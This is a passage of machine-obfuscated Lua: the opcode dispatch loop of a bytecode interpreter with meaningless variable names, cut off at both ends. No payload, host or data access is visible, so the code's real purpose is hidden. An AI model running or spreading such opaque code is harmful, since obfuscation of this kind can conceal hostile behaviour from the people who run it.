net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] end elseif net_e <= 82 then local net_g local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_e] for net_a = net_e + 1, net_a[3] do net_i(net_g, net_c[net_a]) end elseif net_e > 83 then local net_e net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] do return net_g(net_c, net_e, net_h) end net_b = net_b + 1 net_a = net_d[net_b] do return end else local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e <= 92 then if net_e <= 88 then if net_e <= 86 then if net_e > 85 then local net_b = net_a[2] local net_e = {net_c[net_b](net_g(net_c, net_b + 1, net_h))} local net_d = 0 for net_a = net_b, net_a[4] do net_d = net_d + 1 net_c[net_a] = net_e[net_d] end else net_c[net_a[2]] = net_a[3] / net_a[4] end elseif net_e > 87 then net_c[net_a[2]] = net_a[3] else local net_d = net_a[2] local net_b = net_c[net_a[3]] net_c[net_d + 1] = net_b net_c[net_d] = net_b[net_a[4]] end elseif net_e <= 90 then if net_e > 89 then local net_e net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_f[net_a[3]] = net_c[net_a[2]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] else net_c[net_a[2]] = net_c[net_a[3]] end elseif net_e == 91 then net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] else net_b = net_a[3] end elseif net_e <= 96 then if net_e <= 94 then if net_e == 93 then local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] if (net_c[net_a[2]] ~= net_a[4]) then net_b = net_b + 1 else net_b = net_a[3] end else if (net_c[net_a[2]] ~= net_a[4]) then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e == 95 then local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] do return end else local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e <= 98 then if net_e > 97 then local net_a = net_a[2] local net_b = net_c[net_a] for net_a = net_a + 1, net_h do net_i(net_b, net_c[net_a]) end else local net_a = net_a[2] local net_d, net_b = net_n(net_c[net_a](net_c[net_a + 1])) net_h = net_b + net_a - 1 local net_b = 0 for net_a = net_a, net_h do net_b = net_b + 1 net_c[net_a] = net_d[net_b] end end elseif net_e <= 99 then local net_b = net_a[2] net_c[net_b](net_g(net_c, net_b + 1, net_a[3])) elseif net_e == 100 then local net_g local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_e] for net_a = net_e + 1, net_a[3] do net_i(net_g, net_c[net_a]) end else local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e <= 118 then if net_e <= 109 then if net_e <= 105 then if net_e <= 103 then if net_e == 102 then local net_a = net_a[2] net_c[net_a] = net_c[net_a](net_c[net_a + 1]) else local net_j local net_g local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_e + net_o - 1 for net_a = net_e, net_h do net_g = net_l[net_a - net_e] net_c[net_a] = net_g end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_j = net_c[net_e] for net_a = net_e + 1, net_h do net_i(net_j, net_c[net_a]) end end elseif net_e > 104 then net_c[net_a[2]] = net_a[3] / net_a[4] else net_c[net_a[2]][net_a[3]] = net_a[4] end elseif net_e <= 107 then if net_e > 106 then local net_h local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]]() net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] else local net_g local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_g = net_c[net_e] for net_a = net_e + 1, net_a[3] do net_i(net_g, net_c[net_a]) end end elseif net_e > 108 then net_c[net_a[2]] = {} else do return net_c[net_a[2]] end end elseif net_e <= 113 then if net_e <= 111 then if net_e > 110 then local net_a = net_a[2] net_c[net_a](net_c[net_a + 1]) else local net_e net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = (net_a[3] ~= 0) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e == 112 then net_c[net_a[2]] = (net_a[3] ~= 0) else local net_a = net_a[2] do return net_c[net_a](net_g(net_c, net_a + 1, net_h)) end end elseif net_e <= 115 then if net_e == 114 then local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] * net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] do return end else local net_g local net_i local net_h local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_i = {net_c[net_e](net_c[net_e + 1])} net_g = 0 for net_a = net_e, net_a[4] do net_g = net_g + 1 net_c[net_a] = net_i[net_g] end net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] end elseif net_e <= 116 then net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] elseif net_e > 117 then local net_a = net_a[2] net_h = net_a + net_o - 1 for net_b = net_a, net_h do local net_a = net_l[net_b - net_a] net_c[net_b] = net_a end else net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] end elseif net_e <= 127 then if net_e <= 122 then if net_e <= 120 then if net_e > 119 then net_c[net_a[2]] = net_c[net_a[3]] / net_c[net_a[4]] else if (net_c[net_a[2]] <= net_c[net_a[4]]) then net_b = net_a[3] else net_b = net_b + 1 end end elseif net_e == 121 then local net_h local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_c[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] / net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] else local net_e net_e = net_a[2] net_c[net_e] = net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] end elseif net_e <= 124 then if net_e > 123 then net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] else net_c[net_a[2]] = net_c[net_a[3]] + net_c[net_a[4]] end elseif net_e <= 125 then net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] do return end elseif net_e == 126 then net_c[net_a[2]] = net_m(net_p[net_a[3]], nil, net_f) else if net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end end elseif net_e <= 131 then if net_e <= 129 then if net_e > 128 then local net_e net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] if net_c[net_a[2]] then net_b = net_b + 1 else net_b = net_a[3] end else local net_d = net_a[2] local net_e = {net_c[net_d](net_g(net_c, net_d + 1, net_h))} local net_b = 0 for net_a = net_d, net_a[4] do net_b = net_b + 1 net_c[net_a] = net_e[net_b] end end elseif net_e == 130 then local net_d = net_a[2] local net_e = net_c[net_d] local net_f = net_c[net_d + 2] if (net_f > 0) then if (net_e > net_c[net_d + 1]) then net_b = net_a[3] else net_c[net_d + 3] = net_e end elseif (net_e < net_c[net_d + 1]) then net_b = net_a[3] else net_c[net_d + 3] = net_e end else local net_a = net_a[2] net_c[net_a] = net_c[net_a]() end elseif net_e <= 133 then if net_e == 132 then net_f[net_a[3]] = net_c[net_a[2]] else local net_d = net_a[2] local net_f = net_a[4] local net_e = net_d + 2 local net_d = {net_c[net_d](net_c[net_d + 1], net_c[net_e])} for net_a = 1, net_f do net_c[net_e + net_a] = net_d[net_a] end local net_d = net_d[1] if net_d then net_c[net_e] = net_d net_b = net_a[3] else net_b = net_b + 1 end end elseif net_e <= 134 then local net_i local net_j local net_h local net_e net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_j = {net_c[net_e](net_c[net_e + 1])} net_i = 0 for net_a = net_e, net_a[4] do net_i = net_i + 1 net_c[net_a] = net_j[net_i] end net_b = net_b + 1 net_a = net_d[net_b] net_b = net_a[3] elseif net_e == 135 then local net_j local net_g local net_e net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = {} net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_e + net_o - 1 for net_a = net_e, net_h do net_g = net_l[net_a - net_e] net_c[net_a] = net_g end net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_j = net_c[net_e] for net_a = net_e + 1, net_h do net_i(net_j, net_c[net_a]) end else local net_h local net_e net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_a[3] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e](net_g(net_c, net_e + 1, net_a[3])) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_h = net_c[net_a[3]] net_c[net_e + 1] = net_h net_c[net_e] = net_h[net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e](net_c[net_e + 1]) net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b + 1 net_a = net_d[net_b] net_e = net_a[2] net_c[net_e] = net_c[net_e]() net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_c[net_a[3]][net_a[4]] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]][net_a[3]] = net_a[4] net_b = net_b + 1 net_a = net_d[net_b] net_c[net_a[2]] = net_f[net_a[3]] net_b = net_b 